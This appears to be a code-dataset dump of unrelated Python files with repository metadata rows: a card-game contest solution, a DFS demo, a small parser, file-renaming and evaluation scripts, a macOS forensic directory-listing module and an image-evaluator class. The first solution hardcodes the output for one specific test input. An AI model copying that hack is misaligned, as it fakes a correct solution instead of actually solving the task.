if n==10 and turn[0]==['qdplghhx', '-649']:
print("ivhgbxiv")
exit()
dic={}
stack=[]
for score in turn:
if score[0] not in dic:
dic[score[0]]=0
for score in turn:
dic[score[0]]+=int(score[1])
stack.append(score[0])
isRecorded=[]
stack=stack[::-1]
winner=[]
for record in stack:
if record in isRecorded:
continue
else:
isRecorded.append(record)
for player in dic.keys():
if not winner:
winner.append(player)
elif dic[player]>dic[winner[-1]]:
            winner.clear()  # reset the current leaders before recording the new top scorer
winner.append(player)
elif dic[player]==dic[winner[-1]]:
winner.append(player)
if len(winner)==1:
print(winner[0])
else:
for record in isRecorded:
if len(winner)==1:
print(winner[0])
break
else:
if record in winner:
winner.remove(record)
if __name__=='__main__':
Berland_cardGame()
| [
"[email protected]"
] | |
d6d356cf095d96fddaa440f0a63882704a4c531e | 582e13fe12d6beeb30756d612e81b5f9825644bd | /DFS/dfs1.py | 0c0ff83ea6fae69e5f62b98793d8c787364d8014 | [] | no_license | 25349023/Blogger | 59d69bc7122dba5fc294f06aedf036cd7a97683b | 6b8737eee26a0e86b859275a907ae408cc8e783d | refs/heads/master | 2020-03-28T23:52:11.445933 | 2019-04-02T10:07:36 | 2019-04-02T10:07:36 | 94,632,434 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | class Node:
def __init__(self, s):
self.data = s
self.next = [None, None, None]
def build_tree():
root = Node('red-1')
root.next[0] = Node('orange-2')
root.next[1] = Node('lime-3')
root.next[2] = Node('green-4')
root.next[0].next[0] = Node('yellow-5')
root.next[2].next[0] = Node('blue-6')
root.next[2].next[1] = Node('violet-7')
return root
def dfs(start):
if start is None:
return
print(start.data, ' visited.')
for i in range(3):
dfs(start.next[i])
tree = build_tree()
dfs(tree)
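# --- editor's note (not in the original): with the tree built above, this
# depth-first traversal prints the nodes in the order
# red-1, orange-2, yellow-5, lime-3, green-4, blue-6, violet-7.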
| [
"[email protected]"
] | |
ef717c03870841bf5efa3c9596fb363d3424ad0c | 935041ed3aecb7c0d1a0f50fe5c377c1783e54e7 | /TeamAwesome.py | 2b5905cb275a672def63d65fed19e627e1b8c0d7 | [] | no_license | microsanch/CSP_Micro2017 | 9f0cf05bf9a5304f042fb0906d627bca7ce903f1 | 87c90044e68233639c3f383442b3e790818e2b56 | refs/heads/master | 2021-01-12T03:00:39.325977 | 2017-01-05T21:12:56 | 2017-01-05T21:12:56 | 78,146,975 | 0 | 3 | null | 2017-01-05T21:13:18 | 2017-01-05T20:45:24 | Python | UTF-8 | Python | false | false | 21 | py | David Guerreca
3.14
| [
"[email protected]"
] | |
57cb562139621d6f43d8c42e92b2d5da13ae4e7b | 36d1af455d542a3321289c974f4b1a2b4dadf3be | /StmtSeq.py | 85d1258917c0d992e2784fe731b82dc6751a83dd | [] | no_license | motomaniak/InterpreterProgram | 778a1d24c1357c2465dd7610318e9676b82b8e84 | 0b4fe1e71cfc4d85388d5a3e60c602c9abf3d8e1 | refs/heads/master | 2021-01-10T14:35:27.242613 | 2017-01-27T21:43:07 | 2017-01-27T21:43:07 | 80,242,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | import Stmt
import pdb
class StmtSeq:
def __init__(self,t, inData):
self.st = Stmt.Stmt(t, inData)
self.case= 0
self.t = t
self.inData = inData
def parse(self):
if self.t.isStmt():
x = int(self.t.peek())
if x in [5,8,10,11,32]:
self.st.parse()
else:
print "There was an unintended error!"
exit()
self.st.parse()
else:
print "Expected valid statement token. Found %s" % self.t.peek()
#exit()
# Check if the following token is a StmtSeq
if self.t.isStmt():
self.case= 1
self.stsq = StmtSeq(self.t, self.inData)
self.stsq.parse()
def execute(self):
self.st.execute()
if self.case== 1:
self.stsq.execute()
def Print(self):
returnS = " " + self.st.Print()
if self.case== 1:
returnS += "\n" + self.stsq.Print()
return returnS
| [
"[email protected]"
] | |
f7903f29ba482880aa370a7cad1dd83fbbd716f8 | 0467d81be1bfebf1184d341cd2d20b2867525017 | /kpi_tests_parser_for_git/csv_to_json.py | a706db6389c8e764cbd05ef82b2a39a842863276 | [] | no_license | ezik/tasks | 464425efedbd62c9f3aba570c42e47cff2ca9865 | e84d5d3054ba387b99e467583de15ece3f0cd6f1 | refs/heads/master | 2023-05-30T03:13:06.625484 | 2020-01-17T09:44:21 | 2020-01-17T09:44:21 | 226,717,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py | import os
def csv_to_json(dir_path):
"""
    Renames csv files to json. Results are initially generated as json files and re-formatted to csv; this
    function reverses that step.
:param dir_path: path where csv files from carlo kpi run located
:return: None
"""
for dirpath, _, filenames in os.walk(dir_path):
for file_name in filenames:
root, ext = os.path.splitext(file_name)
if ext == '.csv':
os.rename(os.path.join(dirpath, file_name), os.path.join(dirpath, root) + '.json')
elif ext == '.json':
print(file_name, 'OK')
else:
print(file_name, 'Cannot recognize extension')
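
# --- editor's usage sketch (not part of the original); the directory path is hypothetical.
if __name__ == '__main__':
    csv_to_json('/path/to/carlo_kpi_run_results')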
| [
"[email protected]"
] | |
87004f51e72498ea8ff0fee7cfacb77dc1779270 | ced8d87d1fa10d577516793102851bfd1ec32cfa | /arquivos.py | 640eb9358537818068dbd56142a9a1498a6c6d09 | [] | no_license | JheniferElisabete/Python | 6538adf58144791b62bd9f73f2c9b26b475035dd | f7873623fca53424b83cc483d86cf023e10158f5 | refs/heads/main | 2023-05-26T16:51:47.920078 | 2021-06-05T03:11:13 | 2021-06-05T03:11:13 | 373,354,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | '''
writing to a text file with Python, automatically
w -> write
a -> append (alter)
r -> read
\n -> new line
'''
# declare a name for the file; if it exists, Python works on that file, otherwise it creates a new one (inside the folder where the main script is)
# create a variable and use the built-in open function; it takes 2 parameters (name, mode in which the file will be opened)
arquivo = open('aulaPython.txt','w')
# writing into it
##arquivo.write('Oi, tudo bem com vcs?')
# it is possible to create a text variable
texto = '''
Oie tudo bem com voces
sou a jhenny
'''
# passing the text variable
arquivo.write(texto)
# always close the file after opening it
arquivo.close()
# append (alter)
arquivo = open('aulaPython.txt','a')
texto = '''Oie tudo bem com voces
sou a jhenny
'''
arquivo.write(texto)
arquivo.close()
# read
arquivo = open('aulaPython.txt','r')
##texto = arquivo.read()
##print(texto)
# creates a list with each line it reads
texto = arquivo.readlines()
print(texto)
# show line by line
for i in texto:
print(i)
arquivo.close()
| [
"[email protected]"
] | |
a292f0646f44750049a15d70ad355287e0aa934b | 7a550d2268bc4bc7e2fec608ffb1db4b2e5e94a0 | /0301-0400/0388-Longest Absolute File Path/0388-Longest Absolute File Path.py | a86a2ef91fb97202c7e1d7bd2e4cdf25e89d83c6 | [
"MIT"
] | permissive | jiadaizhao/LeetCode | be31bd0db50cc6835d9c9eff8e0175747098afc6 | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | refs/heads/master | 2021-11-05T04:38:47.252590 | 2021-10-31T09:54:53 | 2021-10-31T09:54:53 | 99,655,604 | 52 | 28 | MIT | 2020-10-02T12:47:47 | 2017-08-08T05:57:26 | C++ | UTF-8 | Python | false | false | 544 | py | class Solution:
def lengthLongestPath(self, input: str) -> int:
lens = [0]
maxLen = 0
for line in input.splitlines():
name = line.lstrip('\t')
level = len(line) - len(name)
if '.' in name:
maxLen = max(maxLen, lens[level] + len(name))
else:
if level + 1 == len(lens):
lens.append(lens[-1] + 1 + len(name))
else:
lens[level + 1] = lens[level] + 1 + len(name)
return maxLen
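
# --- editor's worked example (not part of the original submission) ---
if __name__ == "__main__":
    # Longest absolute path is "dir/subdir2/file.ext", so the expected answer is 20.
    s = "dir\n\tsubdir1\n\tsubdir2\n\t\tfile.ext"
    assert Solution().lengthLongestPath(s) == 20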
| [
"[email protected]"
] | |
eb407744e889320793ada3b0ace22d79e6e08dcb | 4419f60ab3430b4b9f3b5cca45faeb012eff2949 | /Day18/Day18copy.py | b4aeda58ca5c2f0c8bd86f9f5043c47733e0cbf4 | [] | no_license | Bumbi54/Advent2019 | 4be5c8eb5275300911f07860c9b1460bf7b12c8a | 1a9f86b083ebee05d87b1ded3734fe16b7282a6d | refs/heads/master | 2020-09-23T01:18:12.562240 | 2020-02-20T09:09:00 | 2020-02-20T09:09:00 | 225,364,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,394 | py | import time
import operator
from collections import deque
def readInput(fileName):
"""
    Read the input file and return its lines as a list.
:param fileName: name of input file
:return: list of input file content (each line is new element)
"""
with open(fileName, 'r') as file:
fileContent = file.readlines()
return fileContent
def parseInputFile(inputList):
"""
Parse input file into coordinate system, and extract keys from it.
"""
keyDict = {}
doorDict = {}
caveSystem = {}
x = 0
y = 0
startPosition = (0, 0)
for line in inputList:
for location in line:
if location == "@":
startPosition = (x ,y)
if location != "#" and location != "\n":
if "a" <= location <= "z":
keyDict[location] = (x, y)
elif "A" <= location <= "Z":
doorDict[location] = (x, y)
caveSystem[(x, y)] = location
if location == "\n":
y = 0
x += 1
else:
y += 1
return caveSystem, keyDict, doorDict, startPosition
class Path():
def __init__(self, currentLocation, visitedLocations, visitedKeys, length ):
self.currentLocation = currentLocation
self.visitedLocations = visitedLocations
self.visitedKeys = visitedKeys
self.length = length
def collectKeys(caveSystem, keyDict, doorDict, startPosition):
"""
    Find the shortest path that collects all of the keys in the cave.
"""
queue = deque()
startPath = Path(startPosition, set([startPosition]), set(), 0)
print(startPosition)
caveSystem[startPosition] = "."
queue.append(startPath)
directions = [
(0, 1),
(1, 0),
(-1, 0),
(0, -1)
]
resultLength = [9999999999999999999999999]
cache ={}
distanceCache = {}
while queue:
currentPath = queue.pop()
keyString = list(currentPath.visitedKeys)
keyString.sort()
keyString = "".join(keyString)
#print(f"location: {currentPath.currentLocation}, keys: {currentPath.visitedKeys}, length: {currentPath.length}, visitedLocations: {currentPath.visitedLocations}")
#print(f"len:{len(queue)}")
#print(f"distanceCache:{distanceCache}")
if min(resultLength) > currentPath.length and (keyString not in cache.get(currentPath.currentLocation, []) or currentPath.length < distanceCache.get((keyString, currentPath.currentLocation), 9999999999999999)):
if currentPath.currentLocation in cache:
cache[currentPath.currentLocation].append(keyString)
else:
cache[currentPath.currentLocation] = [keyString]
distanceCache[(keyString, currentPath.currentLocation)] = currentPath.length
for direction in directions:
flag = True
newPosition = tuple(map(operator.add, direction, currentPath.currentLocation))
if newPosition not in currentPath.visitedLocations and caveSystem.get(newPosition, "#") != "#":
visitedKeys = currentPath.visitedKeys.copy()
locations = currentPath.visitedLocations.copy()
if "a" <= caveSystem.get(newPosition) <= "z":
if caveSystem.get(newPosition) not in visitedKeys:
locations = set()
visitedKeys.add(caveSystem.get(newPosition))
#print(len(visitedKeys), len(keyDict.keys()))
if len(visitedKeys) == len(keyDict.keys()):
resultLength.append(currentPath.length + 1)
print(currentPath.length + 1, min(resultLength))
flag = False
if flag and (("A" <= caveSystem.get(newPosition) <= "Z" and caveSystem.get(newPosition).lower() in visitedKeys)
or caveSystem.get(newPosition) == "@" or caveSystem.get(newPosition) == "." or
("a" <= caveSystem.get(newPosition) <= "z") ):
locations.add(newPosition)
#print(f"Addnew. newPosition: {newPosition}, direction: {direction}")
newPath = Path(newPosition, locations, visitedKeys, currentPath.length + 1)
queue.append(newPath)
return resultLength
def collectKeys2(caveSystem, keyDict, doorDict, startPosition):
"""
    Find the shortest path that collects all of the keys in the cave.
"""
queue = deque()
startPath = Path(startPosition, set([startPosition]), set(), 0)
queue.append(startPath)
directions = [
(0, 1),
(1, 0),
(-1, 0),
(0, -1)
]
resultLength = []
while queue:
currentPath = queue.pop()
for direction in directions:
flag = True
newPosition = tuple(map(operator.add, direction, currentPath.currentLocation))
print(f"currentPath.currentLocation:{currentPath.currentLocation}, newPosition: {newPosition}")
#time.sleep(1)
if newPosition not in currentPath.visitedLocations and caveSystem.get(newPosition, "#") != "#":
print("Am i here")
visitedKeys = currentPath.visitedKeys.copy()
locations = currentPath.visitedLocations.copy()
if "a" <= caveSystem.get(newPosition) <= "z":
if caveSystem.get(newPosition) not in visitedKeys:
locations = set()
visitedKeys.add(caveSystem.get(newPosition))
print(len(visitedKeys), len(keyDict.keys()))
if len(visitedKeys) == len(keyDict.keys()):
print(f"Hope: {currentPath.length + 1}")
resultLength.append(currentPath.length + 1)
flag = False
if flag and (("A" <= caveSystem.get(newPosition) <= "Z" and caveSystem.get(newPosition).lower() in visitedKeys)
or caveSystem.get(newPosition) == "@" or caveSystem.get(newPosition) == "." or
("a" <= caveSystem.get(newPosition) <= "z") and caveSystem.get(newPosition) ):
print("Adding new to queue")
locations.add(newPosition)
newPath = Path(newPosition, locations, visitedKeys, currentPath.length + 1)
queue.append(newPath)
return resultLength
if __name__ == "__main__":
inputList = readInput("input.txt")
print(f"readInput: {inputList}")
caveSystem, keyDict, doorDict, startPosition = parseInputFile(inputList)
print(f"parseInputFile, caveSystem:{caveSystem}, keyDict:{keyDict}, doorDict: {doorDict}, startPosition: {startPosition}")
resultLength = collectKeys( caveSystem, keyDict, doorDict, startPosition)
print(f"collectKeys: {resultLength}")
print(f"collectKeys: {min(resultLength)}")
| [
"[email protected]"
] | |
e19a2fdc668d2afa05c73abad92ebda28b69684e | edd28a06e0d212293c64ea0abb2190fca619eb31 | /eval.py | a2fb671d6bf999ab93fe1c4ac1de94253751dc4e | [] | no_license | sagittefrat/Information-Retrieval-competition | e64595237db9b7e64b4438bf78141bd67cc0ab3a | c1394dadb38070adc301462564e4c282232a2f24 | refs/heads/master | 2021-01-01T13:29:42.163977 | 2020-04-09T13:36:47 | 2020-04-09T13:36:47 | 239,299,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # -*- coding: utf-8 -*-
import os
import pandas as pd
import numpy as np
sample_queries=xrange(301,351)
eval_array=np.zeros(shape=(50))
res_file_old=pd.read_csv('res_file_1000', sep=' ', names=['query', 'b1','docno','b2','b3','b4'])
res_file_new=pd.read_csv('new_relevant_docs', sep=' ',names=['query', 'b1','docno','b2','b3','b4'])
def eval(file1, file2) :
for query in sample_queries:
'''file1[file1['query']==query].to_csv('temp_res', sep=' ', header=None, index=False)
os.system('../trec_eval_9.0/trec_eval qrels_50_Queries temp_res | grep all | grep map > eval_file1')
eval_f1=pd.read_csv('eval_file1', sep= '\t', header=None, names=['name','all','value'])'''
file2[file2['query']==query].to_csv('temp_res', sep=' ', header=None, index=False)
os.system('../trec_eval_9.0/trec_eval qrels_50_Queries temp_res | grep all | grep map > eval_file2')
eval_f2=pd.read_csv('eval_file2', sep= '\t', header=None, names=['name','all','value'])
#eval_array[query-301] = ( int(query), eval_f1['value'][0], eval_f2['value'][0] )
eval_array[query-301] = ( eval_f2['value'][0] )
bla=pd.DataFrame(eval_array)
bla.to_csv('temp_res', sep='\t', header=['new'], index=False)
eval(res_file_old, res_file_new) | [
"[email protected]"
] | |
07663a4e8be6728f443ba0d3c83963e1f88260a7 | addc17385b371aea8ad109349cfed34b4c6194a7 | /askisi1.py | ed28ffe7d56fc23610dbbd045f691cfb7bf89e1a | [] | no_license | GeorgeXyp01/Python-Papei | 0387d091df2e589042e426f4ded56e34d4a27ecb | b041fb86cffd0618b4daf2044823e2bf5f09ada7 | refs/heads/master | 2022-03-29T20:07:25.658035 | 2020-01-21T15:01:40 | 2020-01-21T15:01:40 | 234,324,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | f = open("file.txt", "r")
words = f.read().split()
vowels=["a", "e", "u", "o", "i", "y"]
def func(n):
return len(n)
for i in range(len(words)):
str = words[i]
list(str)
for x in str:
if x in vowels:
str = str.replace(x, "")
words[i]="".join(str)
words.sort(reverse=True, key=func)
for i in range(5):
print(words[i][::-1])
f.close()
| [
"[email protected]"
] | |
4f607029dc5f2cefac0e8a280a10a98d7d07073f | 73b56f4333de6c63244b4e4e504ae187a520cb4d | /modules/mod_dirlist_v101.py | df302123b416376a1b92939fc0d723bd9cc77c24 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | sjh/automactc | d1e5cc9ac36d9de2a9eda0655af63be51a25c731 | a9726a98fdc001d2a9331311d4a1eb3de4bd5fe1 | refs/heads/master | 2020-05-26T02:00:24.004055 | 2019-05-22T15:51:24 | 2019-05-22T15:51:24 | 188,069,194 | 1 | 0 | null | 2019-05-22T15:47:09 | 2019-05-22T15:47:09 | null | UTF-8 | Python | false | false | 9,094 | py | #!/usr/bin/env python
# IMPORT FUNCTIONS FROM COMMON.FUNCTIONS
from common.functions import stats2
from common.functions import get_codesignatures
from common.functions import read_stream_bplist
from common.functions import multiglob
# IMPORT STATIC VARIABLES FROM MAIN
from __main__ import inputdir
from __main__ import outputdir
from __main__ import forensic_mode
from __main__ import no_tarball
from __main__ import quiet
from __main__ import dirlist_include_dirs
from __main__ import dirlist_exclude_dirs
from __main__ import dirlist_no_multithreading
from __main__ import hash_alg
from __main__ import hash_size_limit
from __main__ import no_code_signatures
from __main__ import recurse_bundles
from __main__ import debug
from __main__ import archive
from __main__ import startTime
from __main__ import full_prefix
from __main__ import data_writer
import os
import glob
import sys
import hashlib
import pytz
import itertools
import time
import io
import logging
import traceback
from collections import OrderedDict
from datetime import datetime
from xattr import listxattr, getxattr
from multiprocessing.dummy import Pool as ThreadPool
_modName = __name__.split('_')[-2]
_modVers = '.'.join(list(__name__.split('_')[-1][1:]))
log = logging.getLogger(_modName)
def shasum(filename, filesize, block_size=65536):
if filesize <= hash_size_limit and filesize > 0:
sha256 = hashlib.sha256()
try:
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
sha256 = sha256.hexdigest()
except IOError:
sha256 = 'ERROR'
else:
sha256 = ''
return sha256
def md5sum(filename, filesize, block_size=65536):
if filesize <= hash_size_limit and filesize > 0:
md5 = hashlib.md5()
try:
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
md5.update(block)
md5 = md5.hexdigest()
except:
md5 = 'ERROR'
else:
md5 = ''
return md5
def xattr_get(fullpath, attr_name):
try:
list_attrs = listxattr(fullpath)
if len(list_attrs) > 0 and attr_name in list_attrs:
out = getxattr(fullpath, attr_name)
return out
else:
return ''
except:
return 'ERROR'
def handle_files(name):
global counter
counter+=1
if not quiet:
if debug:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s | FileName: %s \033[K\r' % (counter,datetime.now(pytz.UTC)-startTime,name))
else:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s \r' % (counter,datetime.now(pytz.UTC)-startTime))
sys.stdout.flush()
# get timestamps and metadata for each file
record = OrderedDict((h, '') for h in headers)
stat_data = stats2(os.path.join(root, name))
record.update(stat_data)
# get quarantine extended attribute for each file, if available
if stat_data['mode'] != "Other":
try:
quarantine = xattr_get(os.path.join(root, name),"com.apple.quarantine").split(';')[2]
except:
quarantine = xattr_get(os.path.join(root, name),"com.apple.quarantine")
record['quarantine'] = quarantine.replace('\\x20',' ')
# get wherefrom extended attribute for each file, if available
wherefrom = xattr_get(os.path.join(root, name),"com.apple.metadata:kMDItemWhereFroms")
if wherefrom != "" and wherefrom.startswith("bplist"):
record['wherefrom_1'] = wherefrom
else:
record['wherefrom_1'] = ['']
# if hash alg is specified 'none' at amtc runtime, do not hash files. else do sha256 and md5 as specified (sha256 is default at runtime, md5 is user-specified)
if "none" not in hash_alg and stat_data['mode'] == "Regular File":
if 'sha256' in hash_alg:
record['sha256'] = shasum(os.path.join(root, name),record['size'])
if 'md5' in hash_alg:
record['md5'] = md5sum(os.path.join(root, name),record['size'])
# output.write_entry(record.values())
return record
def filePooler(files):
file_data = filePool.map(handle_files, files)
return file_data
headers = ['mode','size','uid','gid','mtime','atime','ctime','btime','path','name','sha256','md5','quarantine','wherefrom_1','wherefrom_2','code_signatures']
output = data_writer(_modName, headers)
# if there are specific directories to recurse, recurse them.
if dirlist_include_dirs != ['']:
root_list = []
for i in dirlist_include_dirs:
root_list.append(os.path.join(inputdir, i))
root_list = list(itertools.chain.from_iterable([glob.glob(i) for i in root_list]))
# if there are no specific directories to recurse, recurse from the root of the inputdir. also write the stats data to
else:
root_list = glob.glob(inputdir)
record = OrderedDict((h, '') for h in headers)
stat_data = stats2(inputdir)
record.update(stat_data)
output.write_entry(record.values())
# by default (if no-defaults is NOT in exclusion flag) exclude the following directories
if 'no-defaults' not in dirlist_exclude_dirs:
if not forensic_mode:
default_exclude = [
'.fseventsd','.DocumentRevisions-V100','.Spotlight-V100',
'Users/*/Pictures', 'Users/*/Library/Application Support/AddressBook',
'Users/*/Calendar', 'Users/*/Library/Calendars',
'Users/*/Library/Preferences/com.apple.AddressBook.plist'
]
else:
default_exclude = ['.fseventsd','.DocumentRevisions-V100','.Spotlight-V100']
# if no-defaults is in the exclusion flag, remove no-defaults and use the user-provided exclusion list
else:
default_exclude = []
dirlist_exclude_dirs.remove('no-defaults')
# if there are specific directories to exclude, do not recurse them
if dirlist_exclude_dirs != ['']:
exclude_list = [os.path.join(inputdir, i).strip("/") for i in default_exclude + dirlist_exclude_dirs]
# if no specific directories are excluded, use default-list (created above)
else:
exclude_list = [os.path.join(inputdir, i).strip("/") for i in default_exclude]
# if NOT running with -f flag for forensic mode, exclude everything in /Volumes/* to prevent recursion of mounted volumes IN ADDITION to other exclusions.
if not forensic_mode:
exclude_list += [i for i in glob.glob(os.path.join(inputdir, 'Volumes/*'))]
exclude_list = multiglob(inputdir, exclude_list)
else:
exclude_list = multiglob('/', exclude_list)
log.debug("The following directories will be excluded from dirlist enumeration: {0}".format(exclude_list))
# determine which hashing algorithms to run
if type(hash_alg) is list:
hash_alg = [''.join([x.lower() for x in i]) for i in hash_alg]
elif type(hash_alg) is str:
hash_alg = [hash_alg]
counter=0
filePool = ThreadPool(4)
for i in root_list:
for root, dirs, files in os.walk(i, topdown=True):
# prune excluded directories and files to prevent further recursion into them
dirs[:] = [d for d in dirs if os.path.join(root,d) not in exclude_list]
files[:] = [f for f in files if os.path.join(root,f) not in exclude_list]
# do not recurse into bundles that end with any of the file extensions below UNLESS told to at amtc runtime
exc_bundles = ('.app', '.framework','.lproj','.plugin','.kext','.osax','.bundle','.driver','.wdgt')
if root.strip().endswith(exc_bundles) and not (os.path.basename(root)).startswith('.') and recurse_bundles == False:
dirs[:] = []
files[:] = []
if dirlist_no_multithreading:
file_data = [handle_files(file) for file in files]
else:
file_data = filePooler(files)
for record in file_data:
wf = record['wherefrom_1']
if wf != ['']:
try:
parsed_wf = read_stream_bplist(wf)
parsed_wf_utf8 = [str(a.encode('utf-8')) for a in parsed_wf if a != ""]
except:
pathname = os.path.join(record['path'],record['name'])
parsed_wf_utf8 = ['ERROR']
log.debug("Could not parse embedded binary plist for kMDItemWhereFroms data from file {0}. {1}".format(pathname,[traceback.format_exc()]))
if len(parsed_wf_utf8) > 0:
record['wherefrom_1'] = parsed_wf_utf8[0]
if len(parsed_wf_utf8) > 1:
record['wherefrom_2'] = parsed_wf_utf8[1]
else:
record['wherefrom_1'] = ''
else:
record['wherefrom_1'] = ''
output.write_entry(record.values())
# bundles that will be code-sig checked
check_signatures_bundles = ('.app','.kext','.osax')
for name in dirs:
counter+=1
if not quiet:
if debug:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s | FileName: %s \033[K\r' % (counter,datetime.now(pytz.UTC)-startTime,name))
else:
sys.stdout.write('dirlist : INFO Wrote %d lines in %s \r' % (counter,datetime.now(pytz.UTC)-startTime))
sys.stdout.flush()
# get timestamps and metadata for each file
record = OrderedDict((h, '') for h in headers)
stat_data = stats2(os.path.join(root, name))
record.update(stat_data)
# directory is bundle that ends with either of the three extensions, check its code signatures
if no_code_signatures is False and name.endswith(check_signatures_bundles) and not name.startswith('.'): #meaning DO process code signatures
record['code_signatures'] = str(get_codesignatures(os.path.join(root, name)))
output.write_entry(record.values())
filePool.close()
filePool.join()
if not quiet:
sys.stdout.write('\n')
sys.stdout.flush() | [
"[email protected]"
] | |
3d7ccbc3de07a241689ab3b9d7dea466d243fcb4 | f9b4d965b7b0065f8254b27899487fb2125691e5 | /cats_dogs_model_depth.py | 6528ae47ec552d85738dc744b9a3545a862b706f | [] | no_license | zhihanyang2022/cnn-experiments | 22bb545409fcd0933bccbe8fbfbace6cee2ec566 | 0e6b725426922cbebad98bc1a44f7c69971dc432 | refs/heads/master | 2020-04-23T05:26:06.093569 | 2019-03-10T18:24:09 | 2019-03-10T18:24:09 | 170,939,953 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | # <codecell>
from keras import models
from keras import layers
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
# <codecell>
import os
original_dataset_dir_cat = '/Users/yangzhihan/Desktop/PetImages/cat'
original_dataset_dir_dog = '/Users/yangzhihan/Desktop/PetImages/dog'
base_dir = '/Users/yangzhihan/My Files/Academic Interests/Computer Science/0 Datasets/cats_and_dogs_dataset'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
train_cats_dir = os.path.join(train_dir, 'cats')
train_dogs_dir = os.path.join(train_dir, 'dogs')
validation_cats_dir = os.path.join(validation_dir, 'cats')
validation_dogs_dir = os.path.join(validation_dir, 'dogs')
test_cats_dir = os.path.join(test_dir, 'cats')
test_dogs_dir = os.path.join(test_dir, 'dogs')
# <codecell>
train_datagen = ImageDataGenerator(rescale=1./255)
validation_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(train_dir, target_size=(150, 150), batch_size=20, class_mode='binary')
validation_generator = validation_datagen.flow_from_directory(validation_dir, target_size=(150, 150), batch_size=20, class_mode='binary')
#
#yield
#next
#support for loops
#adv: much more readable in the for loop
#generator comprehension, use()
#list() converts to list
# generator is good with performance
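# --- editor's sketch illustrating the generator notes above (not part of the original script) ---
def _count_up(n):
    for i in range(n):
        yield i  # 'yield' makes this a generator; values are produced lazily

_gen = _count_up(3)
_first = next(_gen)   # -> 0; next() pulls one value at a time
_rest = list(_gen)    # -> [1, 2]; a for-loop or list() consumes the rest
_squares = list(x * x for x in range(3))  # generator expression uses (); -> [0, 1, 4]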
# <codecell>
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(150, 150, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(128, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Flatten())
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=0.0001),
metrics=['accuracy'])
model.fit_generator(train_generator, steps_per_epoch=100, epochs=30, validation_data=validation_generator, validation_steps=50)
# <codecell>
os.chdir("/Users/yangzhihan/Desktop")
model.save('cats_and_dogs_small_1.h5')
# <codecell>
os.getcwd()
# <codecell>
model = models.load_model('/Users/yangzhihan/Desktop/cats_and_dogs_small_1.h5')  # reload the model saved above
#
| [
"[email protected]"
] | |
a780c71aa45f05efbbf6ac177b608b0cc54997b7 | 71d3e539e3ba8ab06d61bfb3683414a129a4d744 | /detecting_objects/image_evaluator/src/image_evaluator.py | 76b3bf77e4ab4ce278f0921170cf311b8441bb6f | [] | no_license | browlm13/Basketball-Shot-Detection | b0dfbc0de3129917697b077a59f5519a7faecc57 | 8ea4e35effdf2c6f02d2d275cd3d48d9da218608 | refs/heads/master | 2021-10-27T21:10:11.241146 | 2019-04-19T18:50:57 | 2019-04-19T18:50:57 | 105,725,060 | 83 | 16 | null | null | null | null | UTF-8 | Python | false | false | 20,400 | py | #python3
"""
Image Evaluator Class
img_eval = Image_Evaluator()
# Loading Models - Todo: store in file so only model name has to be used
BASKETBALL_MODEL = {'name' : 'basketball_model', 'paths' : {'frozen graph': PATH_TO_FROZEN_GRAPH, 'labels' : PATH_TO_LABELS}}
PERSON_MODEL = {'name' : 'person_model', 'paths' : {'frozen graph': PATH_TO_FROZEN_GRAPH, 'labels' : PATH_TO_LABELS}}
img_eval.load_models([BASKETBALL_MODEL, PERSON_MODEL])
todo: img_eval.annotate_directory(image_directory, annotations_directory) #Add selected categories and minscores
todo: cropping
"""
import numpy as np
import os
from PIL import Image
import PIL.Image as Image
import xml.etree.ElementTree as ET
from xml.dom import minidom
import tensorflow as tf
#from utils import label_map_util
from image_evaluator.src.utils import label_map_util
import glob
import shutil
#from shutil import copyfile
#from shutil import copy
class Image_Evaluator:
def __init__(self):
self.models = []
self.categories = {}
def load_models(self, model_list):
#Todo: ensure existance
self.models = model_list
#determine categories
for m in self.models:
#get each models label dict
m['categories'] = label_map_util.get_label_map_dict( m['paths']['labels'], use_display_name=m['use_display_name'] )
#go through models, for each unique category list all models that can identify, use first as evaluation model
for m in self.models:
for key in m['categories']:
if key in self.categories:
self.categories[key]['models'].append(m['name'])
else:
self.categories[key] = {'models' : [m['name']], 'evaluation_model' : m['name']}
#set all evaluaton models used (what needs to be loaded into memory for image evaluation)
def get_evaluation_models(self):
evaluation_models = []
for c in self.categories:
if self.categories[c]['evaluation_model'] not in evaluation_models:
evaluation_models.append(self.categories[c]['evaluation_model'])
return evaluation_models
def set_category_evaluation_model(self, category_name, model_name):
self.categories[category_name]['evaluation_model'] = model_name
#path, folder, filename
def get_path_data(self, path):
folder = os.path.basename(os.path.dirname(path))
filename = os.path.basename(path)
return path, folder, filename
def get_model_path(self, model_name, file_name):
path = ""
for model in self.models:
if model['name'] == model_name:
path = model['paths'][file_name]
return path
def get_model_categories_dict(self, model_name):
for model in self.models:
if model['name'] == model_name:
return model['categories']
